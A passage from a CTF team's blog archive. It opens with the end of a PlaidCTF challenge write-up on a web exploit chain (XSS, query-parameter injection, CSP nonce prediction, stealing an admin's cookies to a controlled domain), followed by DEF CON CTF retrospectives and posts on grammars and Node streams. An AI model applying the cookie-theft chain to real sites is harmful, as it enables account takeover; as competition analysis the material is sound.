  <script>
    alert("PWN");
  </script>
</script>

We're closer now, but still not able to pull off this crazy exploit. Remember how we can only send Upd8t0r domains to the XSS bot? Well, our initial XSS is on SaMOA. However, the /samoa endpoint takes arguments specifying which items to request. Look at how it does this

let opts;
if (req.query.opts && Array.isArray(req.query.opts)) {
    opts = req.query.opts;
} else {
    opts = ["color", "food"];
}
optString = (opts.map(s => `${s}=true`)).join("&");
res.redirect(`http://${samoa}/auth?redirect=http://${updator}/login&user=Upd8t0r&${optString}`)

Since it naively joins the requested permissions together, if we set opts[] to be user%3d<exploit>%26f, we can have our redirect set the user parameter.
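
Concretely, with opts[] set to the URL-decoded form of that value, the join produces

const opts = ['user=<exploit>&f'];   // URL-decoded form of user%3d<exploit>%26f
opts.map(s => `${s}=true`).join('&');
// -> 'user=<exploit>&f=true', so the /auth redirect ends with
//    ...&user=Upd8t0r&user=<exploit>&f=true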

With this complete, we have everything we need for our exploit chain.

The Exploit (Part 2)

An actual exploit script (guide?) can be found [here](/upload/fee231f6-exploit2.py). For convenience, we'll also step through the process.

The first thing you need to do is to figure out your seed and nonce. In my case, I used the seed "zach" which generated the nonce: "P179M2ydafV7eDiqkc1fvAQfjmCBavE73SYO0Kn0UTjvw2T8lcaKNGAlX5HZZeWkjtxwWf7Z25ZRuZnTKkSjvg==". Once you have that, you need to get a signed token that includes our eval payload. The payload should look like

@"Math.seedrandom`zach`" @"foo"

Note that it's crucial to create a well-formed S-Expression so that the parser gets to the eval phase. However, you also need to have it throw an error so that the admin does not overwrite his cookie. This is what the reference to foo is for.

Now that we have our signed token, we can create our inner XSS. You can look at the exploit script for details, but mine is just a dumb redirect to a domain I control with the cookies as a query parameter. Make sure that the script tag this is enclosed in has our predicted nonce. Otherwise, Chrome will not run it. Since we need this to be injected, register an account on SaMOA using this as the username. You must also create an account on Upd8t0r by hitting the /samoa endpoint once.

We're now very close. All that remains is to write our outer XSS, which will be wrapped in the ractive impersonation tag. This script first needs to hit the /login endpoint of Upd8t0r using the malicious token we created earlier. Then, it needs to have the client POST to /login with the password you set. It's probably easier to perform this POST as a redirect by creating a form on the page and submitting it. Then, when Chrome renders the welcome screen, your exploit will execute, giving you the admin's cookies.

And that's it, you've gotten the flag!

Issues and Lessons Learned

As I mentioned earlier, this problem ended up being significantly harder than I intended. I knew it would be tricky, but I had anticipated solve counts around 40/5 instead of 16/2. So what went wrong?

Well, the cop-out answer is that because Plaid was only 36 hours this year, teams didn't have enough time. While this is true, it masks some deeper issues that I could have prevented. Firstly, the source leak at the beginning was a little bit too guessy. I thought it was obvious, and testers found it quickly as well, but I think people are used to seeing LFI as the result of query params, and were confused by this related, but more disguised endpoint.

Beyond that, I think the encoding issue with the LFI was especially problematic. Everyone assumed that it was just a corrupted binary, not realizing that the translation from latin1 to utf-8 was the issue. It might have been a little contrived, but I think casing on whether it was a binary or not and then changing the mime type to something more appropriate would have helped teams along.

Finally, I think this was just too complicated. As for this, I'm divided. On the one hand, I think that this exploit chain was one of the most fun I've ever performed. At the same time, seeing first hand the frustration of all those on IRC confused by the different pieces, I'm not sure that it was appropriate for a CTF. For organizers, I'll leave this decision up to you, and for players, I'll try to be more considerate next time (perhaps with more intermediate flags).

It's also worth noting that at least one of the two teams who solved this problem did not use this exact exploit. They instead noted that although you can't run JS on the post pages, you can embed a meta redirect tag to transfer the bot over to a domain you control. While it's always annoying as a problem developer to see bypasses to your problem, in this case they only bypassed the XSS on SaMOA, and in a very clever way.

Thanks

Thanks to all who played, and congratulations to TeaDeliverers and GermanysNextRopModel for solving part two. Please feel free to complain or offer suggestions to @zwad3. Thanks!

GADTs: Wizardry for a Typesafe Age
Feb 05 2018

Generalized algebraic data types (or GADTs) are a powerful tool that can augment algebraic type systems enabling them to be far more expressive. In addition to enabling polymorphic recursion, they also serve as a fundamental unit for existential types. In this post we will look at what all of those phrases mean, and how GADTs can be used in practice.

^

Background

While it's easy to think there is only one correct way to write code, in practice the conflict between typed and ==untyped languages== remains undecided.

To Depart from Clemency: A DEF CON 2017 Retrospective
Aug 01 2017

Another year, another DEF CON. This year, from the far reaches of LegitBS’s wild imagination came an architecture so bizarre and so confusing that it was actually pretty good. Over the course of three days, we were introduced to cLEMENCy, an intriguing RISC architecture that sported 9-bit bytes, middle endianness, and reversible stacks. It took many sleepless nights, but once again we were able to tool and exploit our way to a tight victory. As a member of the Plaid Parliament of Pwning, here is an overview of the year’s biggest CTF from my perspective.

Initial Trepidation

In August 2016, following the presentation of the DEF CON CTF 2016 results, the Legitimate Business Syndicate (often called LegitBS or LBS) announced that for their final year as the hosts of DEF CON’s premier competition, they would be debuting a custom architecture that Lightning (creator of the world’s most terrifying CTF pwnables) had been working on for two years prior. The reactions to this news were, as one might imagine, mixed. As someone who first learned assembly programming on an M6800, I was excited about getting to use an architecture more RISC-like than x86. Other members of the PPP were significantly less enthused, fearing that the custom architecture would render all of our existing tools useless, and that we would be unable to prepare at all for the following year’s competition. While these fears were justified to a certain extent, LegitBS still pulled off an incredibly fun and exciting game.

cLEMENCy and the Proliferation of Terrible Acronyms

At 9:00 am on the Thursday of DEF CON 25, the Legitimate Business Syndicate tweeted out a link to the official documentation for cLEMENCy — the LegitBS Middle Endian Computer Architecture. While the wonderful folks at LBS might not understand how acronyms work, they apparently have a great sense of humor. Upon downloading and opening the cLEMENCy manual, we discovered that this architecture not only — as the name suggests — is middle endian, but also makes use of ==2-byte and 3-byte words== composed of 9-bit bytes, which our team and several others lovingly came to refer to as nytes.

Sour Lemons

As I mentioned earlier, I once again found myself working on and supporting our defensive efforts. As in previous years, during the competition we were to receive packet captures of all network traffic entering and exiting our host machine, arriving each round on a three-round delay (that is, arriving every 5 minutes on a 15-minute delay). Since these could get huge — some rounds we recorded over 3,000 distinct conversations — we needed pretty powerful infrastructure to manage them. In advance, we had written a packet capture management framework called Aviary which could handle all of the processing we wanted to perform on the network traffic and present it in an intuitive and friendly interface. This was perhaps the most useful of our defensive tools, because it allowed one or two people to effectively monitor all of our network traffic.

However, once we encountered suspicious network traffic we needed a way to confirm that we were in fact being attacked. To address this problem, I spent most of my time working on CITRUS, the Clemency Interactive Terminal and Real-time Unassembly System.

The basic principle behind CITRUS was to act as a web-based frontend for the cLEMENCy debugger. While the debugger was reasonably powerful (and was more than I had expected LBS to provide us with) it was still a pain to use and couldn’t easily interface with our existing systems. To address this, CITRUS would allow a web-frontend to automatically spawn a debugger instance on an AWS server farm somewhere and then talk to it via websockets. The hope was that CITRUS would make debugging cLEMENCy programs easier while simultaneously allowing us to replay network traffic and examine it for bugs and flags.

What I had originally intended to be a quick little debugging tool ended up becoming my primary focus for the duration of the competition. When I had sketched out a design of CITRUS on paper, I hadn’t considered the difficulties presented by talking to a system that packed its data differently than the rest of the world. Specifically, in order to use the debugger and emulator simultaneously, it was necessary to communicate with the debugger over STDIN/STDOUT and the program itself over a TCP connection. This seems fine at first, until you consider what happens when the number of nytes you need to send does not pack evenly into 8-bit bytes. Because the protocol expects to send whole bytes, if cLEMENCy wants to write 5 nytes, it has to write 45 bits of data, followed by 3 bits of padding to round the total number of bits written up to a whole number of bytes.

This alone isn’t an issue — to read a packet of packed nytes, one simply needs to read bits until there aren’t enough to fill a full nyte, then drop the remaining padding. Unfortunately, TCP stacks often try to be intelligent to improve performance. Thus, if two packets come in at the same time, they will be buffered for a short period of time, resulting in them being automatically concatenated before being presented to the application. Once this happens with packed nytes, the stream becomes unreadable — there are an unspecified number of 0 bits used for padding distributed in the buffer where the packet boundaries used to be. My first implementation of CITRUS, which used the Node.js Net module to communicate directly with the emulator, suffered from this exact problem. After spending several hours trying to find a way to deal with this, I ended up spinning up a separate python process to serve as a proxy for communication with the emulator since its TCP stack does not do such buffering.
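
For a sense of what that unpacking looks like in isolation, here is a minimal sketch (not the actual CITRUS code, and it assumes nytes are packed most-significant-bit first):

// Unpack a single packet of 9-bit nytes from an 8-bit byte stream,
// consuming bits MSB-first and discarding the trailing padding.
function unpackNytes(packet) {
  const nytes = [];
  let acc = 0;   // bit accumulator
  let bits = 0;  // number of valid bits currently in acc
  for (const byte of packet) {
    acc = (acc << 8) | byte;
    bits += 8;
    if (bits >= 9) {
      bits -= 9;
      nytes.push((acc >> bits) & 0x1ff);  // peel off the top 9 bits
      acc &= (1 << bits) - 1;
    }
  }
  return nytes;  // any leftover bits (< 9) are padding, dropped here
}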

Mmmm.... Zesty

While this wasn’t the only problem that arose during development, I like it because it illustrates the random problems you can face while working with a system like cLEMENCy. Unfortunately, as a result of some of these issues, CITRUS never really met its original goal. The system worked well locally, but when it was spinning up twenty different emulators, it often choked and died. However, it did prove incredibly helpful for testing network conversations for exploit behaviour, and we were able to use it in a number of ways to aid our defensive stack.

To Those About to Hack…

Once the competition began Friday morning, it was non-stop work. On the competition floor all teams had up to 8 members seated at their team’s workspace. This was the only way to connect to the game’s infrastructure, so while it was not required for team members to play on the floor itself, there was a certain implicit requirement for some portion of the team to be present. In practice, we saw most teams had 6 to 8 people in the competition room for the duration of the game. From the game start onward, rounds progressed every 5 minutes with each team able to submit one flag for each of an opposing team’s services in any given round. On Friday, the game lasted from 10:00 am to 8:00 pm, with a total of 3 challenges (“rubix”, “quarter”, and “internet3”) released that day. The first challenge, “rubix”, was difficult because it was nearly impossible to patch without violating the service functionality tests (which causes a team to forfeit all points associated with the problem during a failed round). The second binary, “quarter”, had the opposite issue wherein by the end of the second day everyone had patched out all of the major bugs. The remaining program, “internet3”, had much more action, with exploits being thrown all the way until the game’s end.

Likewise, on Saturday the game lasted from 10:00 am to 8:00 pm with five more challenges released (“babysfirst”, “half”, “legitbbs”, “picturemgr”, and “trackerd”). However, much to our surprise, in spite of the challenge additions, none of the existing challenges were removed. This made it much more difficult to play defense, because it required us to stretch ourselves thin monitoring several different services. Finally, on Sunday the game lasted only from 10:00 am to 2:00 pm with one final challenge (“babyecho”) being released, concluding a frenetic weekend.

…We Salute You

For a precise breakdown of everything that occurred over those three days, I would implore you to examine LegitBS’ data dump from the competition. While I’ve only paid it a cursory glance, you can see a rough graph of how scores progressed over time below:

#defcon25 CTF score graph. CC @LegitBS_CTF pic.twitter.com/UsukelGR24

— Robert Xiao (@nneonneo) July 31, 2017

As the graph shows, the game was very close, with us edging out HITCON by only about 3,000 points. In addition, all of the other teams played very well, and really made the competition exciting. Special Kudos to pasten for first-blooding us with picturemgr. I think we all got a good kick out of that.

With LBS’s departure, we’re not sure what the future of DEF CON CTF holds; however, regardless of what happens, DEF CON 2017 was a blast. Once again, thanks to all of the teams and to LegitBS for an incredibly fun weekend.

A DefCon 2016 Retrospective
Aug 10 2016

Defcon CTF 2016 was held from August 5th to 7th during the annual Defcon conference. This year DARPA chose to host their Cyber Grand Challenge (CGC) — a CTF-style competition between fully autonomous Cyber Reasoning Systems (CRS’) — at Defcon as well, so the Legitimate Business Syndicate oriented their competition around it to allow the winning machine to compete against the human teams. The new format brought with it several interesting gameplay mechanisms as well as a couple of issues, resulting in a fun but occasionally problematic contest. During the competition I played with the Plaid Parliament of Pwning (PPP), with whom I placed first. This is a brief reflection of how the game operated, what succeeded, and what did not.

Overview of the CGC Game Format

The Cyber Grand Challenge game, as designed by DARPA, was meant to be played by autonomous machines, and the design well reflects this. It is an attack-defense style CTF with each team able to throw exploits, submit patches, and view traffic. However, it relies on a rigid api that is well suited to autonomous play. One unique aspect of this game structure is the exploits. Strictly speaking, in CGC exploitation is not required. Instead, teams submit Proofs of Vulnerability (PoVs) that demonstrate the ability to gain access to an opponent’s machine. These PoVs can take one of two forms, and are verified by an automated referee: A type-1 PoV requires the attacker to crash the opponent’s system with a segmentation fault and have control over EIP and one other general purpose register at the time of crash. A type-2 PoV requires instead that the attacker leak four consecutive bytes from the “secret page,” a set of addresses in the range 0x4347C000-0x4347D000 (CG\xC0\x00). Submitting either one of these counts as “proving” the vulnerability, and nets the attacking team a set amount of points.

Another important difference in CGC compared to a traditional CTF is its use of the DARPA Experimental Cyber Research Evaluation Environment, or DECREE. DECREE is a custom build of Linux that only has seven syscalls. These syscalls cover only the most basic functionality, and allow access to the terminate, transmit, receive, fdwait, allocate, deallocate, and random method stubs. No other syscalls are available to binaries running on DECREE. The other, and less significant change is to the executable file format. Almost all aspects of it are the same as the ELF format, except that the three bytes of ELF in the header are replaced with CGC. These changes are significant enough to ensure that DECREE binaries will not run properly in another environment ==without reasonable modification==.

The actual structure of the game is round-based. An attacker may run one exploit per challenge, per team, per round, up to ten times. If any of those ten succeed, the attacking team earns the points for that challenge. Conversely, a team earns fewer points for a challenge if they are attacked on that service during the round, if their service is not responding correctly to non-exploit poller traffic, or if their service has poor performance. Finally, if a team wishes to patch or change one of their binaries, they will not be able to earn any points from that service for a round. As a result, it is important for teams to not only find vulnerabilities quickly, but also actively defend and patch against attacks. Rounds last anywhere from 5 to 15 minutes, with approximately 160 rounds played in the DefCon finals.

Pre-Competition Preparation

Since CGC is designed to be played by machines, all of the information about the game is published through an open API. However, this API is unwieldy for humans to interact with by hand, so it was necessary for us to design tools ahead of time to allow for easier interaction.

Among the most important pieces of software we developed was Hydra, a well-designed and easy-to-use interface for interacting with the core CGC API. It served as a way to view both offensive and defensive information about individual binaries, track published actions taken by other teams, and manage our own PoVs and patches. On the whole, it served as our main hub for all CGC-related management.

We also developed several tools to aid in the PoV and patching processes. Perhaps the most noteworthy of these was Python-POV, a custom build of python that could target DECREE. The CGC game format requires that Proofs of Vulnerability be DECREE executables that interact with the challenge binary through file descriptors 0,1 and 2, and with the game referee through file descriptor 3. By rewriting certain core python functions and trimming down the available packages, we were able to package a 5 megabyte python interpreter with all of our PoVs. Thus, we were able to write the actual proof functionality in python and bundle it with the static interpreter. The benefit of this was that we were able to use python’s quick scripting syntax and libraries to make PoV development incredibly fast and accessible.

Another remarkably helpful tool we developed was Butcher, a general purpose tool for interacting with the provided network captures. Its primary function was as a replacement for their cb-packet-log program that would produce Packet Capture files (PCAPs) from the incoming connections. Instead of producing one large conglomerate file for the round, Butcher created a PCAP for every connection and challenge. In addition to this, we included several analysis tools that could provide a color coded transcript of the connection, allow for grep-like search, and replay a packet against the original binary while checking for discrepancies. Butcher, unlike many of the tools we used, underwent significant development during the CTF as our needs were more fully realized. Many of these changes are documented further on.

In addition to these tools, we also had a number of single purpose tools that aided us in everything from reversing to patching. They acted as an interface to the CGC environment and allowed us to use non-CGC tools nearly transparently. These tools formed the backbone of our personal infrastructure and allowed us to focus on the competition.

Gameplay and Strategy

While the PPP has a number of members who are strong at binary reversing and exploitation, we find it difficult to compete on a purely exploit-driven level. Instead, we relied heavily on teamwork and distribution of labor to facilitate the process of developing active PoVs and maintaining the necessary patches. Toward this end, we had team members who took on semi-dedicated roles in the competition. Among these jobs were PoV development, infrastructure management and information dissemination, exploit reverse engineering and reflection, network analysis, and patch construction.

PoV development was easily our strongest group, with most people in other roles working on PoVs whenever their own role was not needed. We typically prefer to develop new exploits whenever possible, as this allows us more time to earn points while people patch the more commonly used vulnerabilities. In a similar fashion, we prefer non-reflectable attacks so that other teams cannot copy our attack and use it for themselves. The result of this is that we would often not use a vulnerability as soon as we found it, but instead build on it and turn it into a more secure PoV. We also preferred to develop Type-2 PoVs since they would not log a crash in the CGC database and the defending team would have no indication that they are being exploited other than the point differential. Following this, one of our best exploits was developed by a member who spent all night writing shellcode in PPC — which was being emulated by the program — that could communicate back to the PoV and could not be easily reflected. This ended up being one of our most useful exploits, as we were the only team to develop a patch for it, and to the best of our knowledge, no teams managed to reflect it in any form. Over the course of the game we found and developed a large number of PoVs using these general guidelines.

On the defensive side, we developed a tight pipeline for detecting and reflecting exploits being thrown at us. As mentioned previously, one tool that underwent significant development over the course of the competition was Butcher, our packet analysis tool. Since each team could throw an exploit for each challenge up to ten times, and the referee had to poll the application roughly 300 times a round, we saw approximately 400 to 450 PCAPs per challenge per round. Given that there tended to be about four challenges available at any given time, and each round lasted, on average, 8 minutes, we were receiving roughly 300 packets every minute. This is a tremendous amount of data to go through, and we realized early on that we needed a better way to process it.

Beginning after the official competition start time, and continuing through the last day of the competition, we began writing b-suspect, a sub-tool of Butcher that would automatically classify and sort PCAPs. For every round and challenge, it would look at all of the packets that we received and try to coalesce the packets that came from a single source into a bucket. Once it had organized them, it used a heuristic based on a number of different characteristics to rank the packets based on likelihood of exploit. The result was a command line interface that could print out a ranked list of buckets, with indicators explaining how the rank was achieved. From there it gave options to use many of the other tools built into Butcher from this REPL. The final version allowed people to effectively analyze every single packet that interacted with our system.

Once a suspicious packet was found, the client data could be passed off to another team member who would analyze it and verify if it was a vulnerability. If they determined that it was in fact a PoV, they would begin the analysis process and try to develop a reflection and patch. If able to successfully reflect it (no attempts were made to obfuscate reflected PoVs), it would be deployed against all teams that were not already being hit. By the end of the competition, we could go from being attacked to reflecting the PoV in about 15 minutes.

One of our biggest surprises came in the form of patches. Despite a joke that everyone would steal PPP’s patches, we didn’t really expect it to happen. We had developed excellent patching infrastructure, and so with all of our patches we shipped a relatively unhidden backdoor. We surmised that it would serve as a deterrent against patch theft and in a few rare cases provide some free points. However, much to our shock, once we started shipping the backdoored patches, teams began applying our patches without modification to their own challenge binaries. Some teams did modify them enough to change the checksum; however, due to a tool we developed that could automatically test PoVs against patches, this ended up not affecting our ability to use the backdoor. Talking to teams following the competition, it seems that several teams actually discovered the backdoor, but decided to employ the patch regardless, deciding that it was better to ensure only one team had access. This may have been well founded, since in the few cases where teams did notice the backdoor and reverted to an earlier patch, we almost always had an actual PoV ready to use against it. It is less clear whether other teams employed backdoors, given that the only times we looked at other teams’ patches were when we needed a team-specific exploit; however, a cursory analysis suggested that two other teams did produce them. Factoring in our ability to quickly develop patches for all the bugs we discovered as well as the PoVs that were thrown against us, using our mega patches could have worked better than relying on their own or another team’s patch.

Lessons Learned from a First Time DefConer

Given that I joined the PPP only a year ago, this was my first opportunity to play with them at an event like DefCon. As such, it was incredible for me to see the team working together at full capacity, and I found a few things incredibly interesting. This was the first CTF I have played in where the preparations lasted longer than the competition itself. We began work on infrastructure about three weeks before DefCon, and continued working on it through the end of the competition. While none of the tools did our job for us, they freed us from having to do the slow, menial tasks that tend to consume so much time. One rather emphatic member of our team kept insisting that the future of security lies in good tools, and following this competition I believe he may have a point. For me certainly, as a lead developer on Butcher, this competition was as much an engineering challenge as it was a security one.

It was also interesting to see how using such a unique format helped to accentuate several of the more interesting aspects of the CGC game style. In a CGC game, players have to take much greater care to balance offense and defense. While this is certainly a requirement in any attack-defense CTF, since CGC reduces your offense score if your defense is failing, it becomes much harder to decouple the two. As a result, it encourages tight teamwork and integration of all gameplay aspects into the decisions that are made. Encouraging teams to work together to act like a fully-fledged Cyber Reasoning System ends up uniting the group in a way few other CTFs do. In this sense, I really liked the CGC format.

However, as a system designed for massively-parallel computers, CGC has many drawbacks when used with humans. Forcing teams to eat a round of downtime when they apply a patch adds in a tremendous amount of meta-gaming with regard to patch application. In the original Cyber Grand Challenge, CRS’ won and lost based on this availability score, which accounts for not only downtime between patches, but also service unavailability as a result of poor patching. Having watched the DARPA contest, we had a good feel for the importance of not over patching, but many teams did not. While with any attack-defense CTF there is a balance of CTF challenge and meta-game challenge, this high reliance on availability shifted the game more toward meta than I would prefer. While each person will have their own preferences, I enjoy CTF puzzles more than CTF game theory.

Another common complaint about this format is the lack of true exploitation. While my descriptions of the game were rather lax about calling PoVs “exploits,” they ultimately are indicators of a potential exploit, rather than exploits themselves. The end results of this are problems that lean very heavily toward buffer overflows and other types of unbounded access. For many bugs, in fact, there was no need for shellcode or arbitrary execution — the attacker could simply persuade the program to give up the flag. For a CRS, this type of problem makes sense; it can easily be fuzzed and the end goal is very well defined. However, for humans, this often results in problems that are unexciting to exploit and instead rely primarily on reversing. This was not universally true, and many of the challenges had deeper bugs that did require significant exploit development, yet the competition was short enough that many teams did not find even the shallow bugs, and so searching for the deeper ones would yield diminishing returns. Unfortunately, this seems to be the nature of CGC, not simply a poor choice by the organizers.

The most direct issue with using CGC came down to sheer numbers. Every round, the referee had to execute all teams’ POVs, deploy all of the poller traffic, update new files, serve network traffic, and store all of their data for later review. By the end of the game, they had released 8 problems, 5 of which were still actively available. As mentioned previously, every challenge binary received about 400 incoming connections per team, each of which was allowed to run for several seconds. Even if we assume an average of 750ms per connection (to account for many programs which will loop forever instead of quitting), that results in over 6 cpu hours per turn. To simulate their competition, DARPA brought in 7 water-cooled supercomputers. For Defcon CTF the organisers could only acquire two small racks. Turns that were intended to last 5 minutes by the end of the game took roughly 13 minutes to simulate. In one instance, an uploaded binary crashed the system and one turn was re-simulated 16 times. For their part, the Legitimate Business Syndicate made the best with what they had. Unfortunately for them and for the competitors, that simply was not enough.

Finally, while I do not wish to spend much time discussing operational failures, there were a number of them, and they serve as a good reminder to test and verify everything before connecting players to the infrastructure. These bugs only minimally affected the human teams, but they ended up crippling the competing CRS, Mayhem.

In spite of this, I would like to congratulate the ForAllSecure team. Even though Mayhem was not receiving a significant amount of information about the game, it still managed to throw exploits and develop patches faster than many teams (ourselves included) were able to.

Final Thoughts

While scores have not yet been published, and we do not know the full details of how teams performed, we do know that Defkor placed third after taking an early lead, B1o0p placed second after a strong showing on the second day, and the Plaid Parliament of Pwning finished first with what we perceived to be a narrow lead. Without a doubt, DEF CON CTF 2016 was one of the most fun CTFs I have played in. Using CGC was frustrating at times, but with the proper preparation and team unity we were able to overcome many of the challenges it presented as a format. Furthermore, I am excited that our team played not only against other human teams, but also against a fully functioning Cyber Reasoning System which, despite being crippled for most of the weekend, performed remarkably well. This game was incredibly close, and all of the teams played exceptionally well. I am thrilled to have competed with and against so many amazing teams, and I look forward to DEF CON 2017.

Update (September 6th)

LegitBS has posted scores from throughout the competition. In a few days they should release the full data set, but for now they have provided this graph of scores over time.

#defcon25 CTF score graph. CC @LegitBS_CTF pic.twitter.com/UsukelGR24

— Robert Xiao (@nneonneo) July 31, 2017

One interesting thing this graph demonstrates is that around turns 60 and 135 (the start of days two and three, respectively) there is a noticeable uptick in the slope of our score. It shows how productive our evenings were, and the crucial difference they made in the outcome of the competition.

Context Free Grammars and the Tyranny of Node
May 22 2016

While language and grammar are undoubtedly linguistic constructs, they have very practical uses in computer science. However, while looking for language and grammar parsing tools written for Node, I was disappointed to find no easy-to-use, suitably flexible libraries. In response, I began development on Tyranny, a Node module for describing and parsing arbitrary context-free grammars. Here is what it is, how it works, and what it can do.


What is a language?

In order to understand grammar as it applies to Tyranny, it is helpful to first understand languages. For many people, a language is a means for two people to convey ideas across time and space. For programmers, a language is a code specification that can be used to describe procedures and algorithms. In computer science and mathematics, however, the idea of a language is far more abstract. In fact, a language is just a set of words, over a specific alphabet, that are considered “valid.”

As an example, take the language that includes only English words: the alphabet contains the characters A through Z, and the language resembles L = {"A", "AARDVARK", "AARON", "ABDICATE", ...}. If a word w is an element of the set L, then it is in our language; otherwise, it is not. However, since we are ultimately just computing a boolean for any w (is it contained in L?), we can also think of the language as being described by a program M. If M(w) == true, then w is in L; if M(w) == false, then w is not. In this case, since M describes the language but is not itself the language, we say that M decides L.
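
As a minimal sketch (using the truncated example set above rather than a full dictionary), such a decider is nothing more than a membership check:

// A toy decider M for the (truncated) language L from above.
var L = new Set(["A", "AARDVARK", "AARON", "ABDICATE"])

// M(w) returns true exactly when w is a member of L, so M decides L.
function M(w) {
    return L.has(w)
}

console.log(M("AARDVARK")) // true
console.log(M("BANANA"))   // false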

So What

Tyranny is still very much a work in progress. Even relatively short grammars (~100 tokens) can take on the order of seconds to run, which causes massive slowdowns during initial compilation and later execution. It also relies on a very limited expression syntax that would benefit from more flexibility. However, it demonstrates the practicality of a context-free grammar parser and fills a gap in the currently available JavaScript modules. If you would like to see more of Tyranny, you can follow development on GitHub or stay tuned for more updates.

Update (4th October 2016)

For those interested, the tyranny package is finally up and running on npm. While it still has a number of inefficiencies, you can install it with npm install tyranny. If you use it, please report any bugs you find to the GitHub repository above.

Stream Based Processing in Node
Apr 24 2016

Over the past few weeks, I have begun working on a set of tools called hakkit to help me write CTF scripts in Node.js. Many of the ideas are lifted from pwnlib, but soon after I started, I realized that by utilizing Node’s stream APIs I could take my tools a step further than the pwnlib ones. By behaving similarly to Unix file descriptors, Node streams allow for powerful and extensible data manipulation.


What is a Stream

For those who are unfamiliar with them, streams are a Node API for moving data between logical endpoints. At first blush this can seem relatively useless: wouldn’t it be easier to store everything in an object and just pass that around? While that often works for small pieces of data, once you add several layers of abstraction and multiple types of data manipulation, the code becomes unwieldy and slow. A stream instead lets you manipulate and parse data as you go, keeping the memory allocation (buffers) small and reducing the access time for retrieving and updating data.

Take, for instance, the act of searching for a word in the dictionary. If this has to be done repeatedly, it may be worthwhile to store its contents in memory. If, however, it only needs to be checked once, then it makes much more sense to stream the data. As the data is read in from the file, it can be immediately checked for the desired contents, and then discarded once the data has been checked. Furthermore, the process can stop reading once it has found the entry it is looking for.
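
As a sketch of that pattern in plain Node (no HakKit yet), the built-in readline module can walk a file line by line and bail out as soon as the word turns up; the dictionary path here is just an example:

var fs = require("fs")
var readline = require("readline")

var input = fs.createReadStream("/usr/share/dict/words")
var rl = readline.createInterface({ input: input })

rl.on("line", function (line) {
    if (line === "banana") {
        console.log("Found")
        // Stop reading; the rest of the file never needs to be loaded.
        rl.close()
        input.destroy()
    }
})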

Ultimately, a stream is a data processing mechanism that has one of the following attributes:

  • It can supply data to another stream (readable)
  • It can consume data from another stream (writable)
  • It can transform data from one stream and send it to another (transform)
  • It can both supply and consume data from either a single stream or two different streams (duplex)

These streams can then be “piped” together into a more powerful stream capable of doing complex data manipulation. Here is an example of a very simple stream that reads in data, converts it to hex, and writes it back to the file system.
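
A minimal version might look like the following, using the built-in stream and fs modules (the file names and the hexify transform are only illustrative):

var fs = require("fs")
var stream = require("stream")

// A transform stream that re-encodes each chunk of input as hex.
var hexify = new stream.Transform({
    transform: function (chunk, encoding, callback) {
        callback(null, chunk.toString("hex"))
    }
})

// Read a file, hexify it, and write the result back to the file system.
fs.createReadStream("input.txt")
    .pipe(hexify)
    .pipe(fs.createWriteStream("output.txt"))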

Notice that this stream is not duplexed: data can only flow in one direction. This is actually the most common way to use a stream, and the way most people are used to seeing them (even if they don’t recognize it as a stream). I mentioned that one stream can be “piped” into another; if that sounds like sh terminology, that is because the two are remarkably similar. Although Node implements them with buffers and objects, Node streams are logically equivalent to file descriptor (fd) streams on *nix systems. In the same way that you could run

$ cat input.txt | hexify > output.txt

to perform a similar transformation by redirecting file descriptors, Node streams can be chained just as easily.

Why Use Streams

Given this, what are the advantages of using streams in Node? In addition to the aforementioned speed and memory benefits, one of the most obvious answers is modularity. This is a buzzword that Node developers especially love to throw around, but it does have some merit. Just as shell commands can be used in a number of different applications, a well-developed stream can be applied to numerous use cases without needing to be modified. In addition, streams are designed to emulate how a generic application runs, and they can interface very easily with a wide range of data sources. One thing that surprised me while working on HakKit was how easy it was to interface with a non-Node command using streams. Streams also benefit from being either lazy or greedy, depending on what the writable stream wants and what the readable stream can provide. As a result, they can easily handle infinite or non-halting data sources (such as a network request).
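
For example, in plain Node (this is not the HakKit API itself), the output of an external command is exposed as just another readable stream:

var spawn = require("child_process").spawn

// Run an external command; its stdout is an ordinary readable stream.
var child = spawn("ls", ["-l"])

// Pipe it into any writable or transform stream (here, our own stdout).
child.stdout.pipe(process.stdout)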

However, despite all these benefits, streams are infrequently used in module APIs. Aside from packages that use them internally but never expose them, the only package I have spent any considerable amount of time with that exposed data streams was node-png. At first, I too was reluctant to use them despite their obvious benefits. Ultimately, I think this arises because streams are confusing and not especially well documented. While streams are a great fit for Node’s asynchronous structure, developers are often used to working with them synchronously, as in shell commands, which have the benefit of being both intuitive and concise.

With HakKit, I have started to abstract the actual stream implementation away and instead provide a generic API that can be used to interface with any type of stream. For instance, the following code performs the dictionary search mentioned earlier:

var hakkit = require("hakkit")
var file = new hakkit.file("/usr/share/dict/web2")
var tube = new hakkit.tube(file)
var data = tube.recvline()
while (data) {
    if (data.toString() == "banana\n") {
        console.log("Found")
        tube.close()
        break
    }
    data = tube.recvline()
}

While this certainly is not as concise as

$ cat /usr/share/dict/web2 | grep "banana"

it approaches that level of readability while retaining the full power of JavaScript syntax. More importantly, because each of these objects is just an abstracted stream, it provides the same underlying functionality as the shell command. Forcing an inherently asynchronous task to be synchronous, such as through the use of tube.recvline(), has clear downsides, yet ease of use and intuitiveness are crucial for good scripting tools, and the hope is that this syntax strikes a balance between the two.

While streams are not practical for every application, there are many cases in which a stream makes the most sense for manipulating data. Hopefully this was helpful, and keep an eye out for new developments with HakKit.

Welcome
Feb 29 2016

Welcome to Down to the Wire!

In the coming weeks we will start adding posts and discussing current projects and goals, including an upcoming post about developing Down to the Wire itself. Until then, however, I wanted to share a little bit about what DttW is, and why we decided to start it.


Who we are

Our team is a group of college students who attended the same high school and then went on to different universities. We had each been planning to create our own personal blogs to keep a record of our projects, competitions, and other cool tech-related news.

However, instead of us each starting our own blog – which would have been difficult to maintain and would not have received much visibility – several of us decided to start a collective blog so that we could help each other and provide a more steady stream of content.

What this is

To accommodate all of us, we built Down to the Wire, something of a mix between a news site and a blog. With it, we hope to have a forum not only to share our ideas with the world, but also to help others who have related interests and to engage in discussion about the current state of technology. Each of us has different interests, ranging from security to competitive programming to game development, so we hope that anyone will be able to find something interesting here. We hope that you will join us in this endeavor and that Down to the Wire will be something special.

Thanks,

The Down to the Wire team.

CTF Problems

Yet Another Calculator App (PlaidCTF 2022): web
Live Art (PicoCTF 2022): web
The Watness III (PlaidCTF 2021): web, reversing
Wowza! (PlaidCTF 2021): web
Bithug (PicoCTF 2021): web
PGUI (ASV CTF2): web, misc
The Watness II (PlaidCTF 2020): reversing
Contrived Web Problem (PlaidCTF 2020): web
MiniCTF (Standalone): web, reversing, misc
Lambdash (PicoCTF 2019): web
The .Wat ness (PlaidCTF 2019): web, reversing
Everland (PlaidCTF 2019): misc
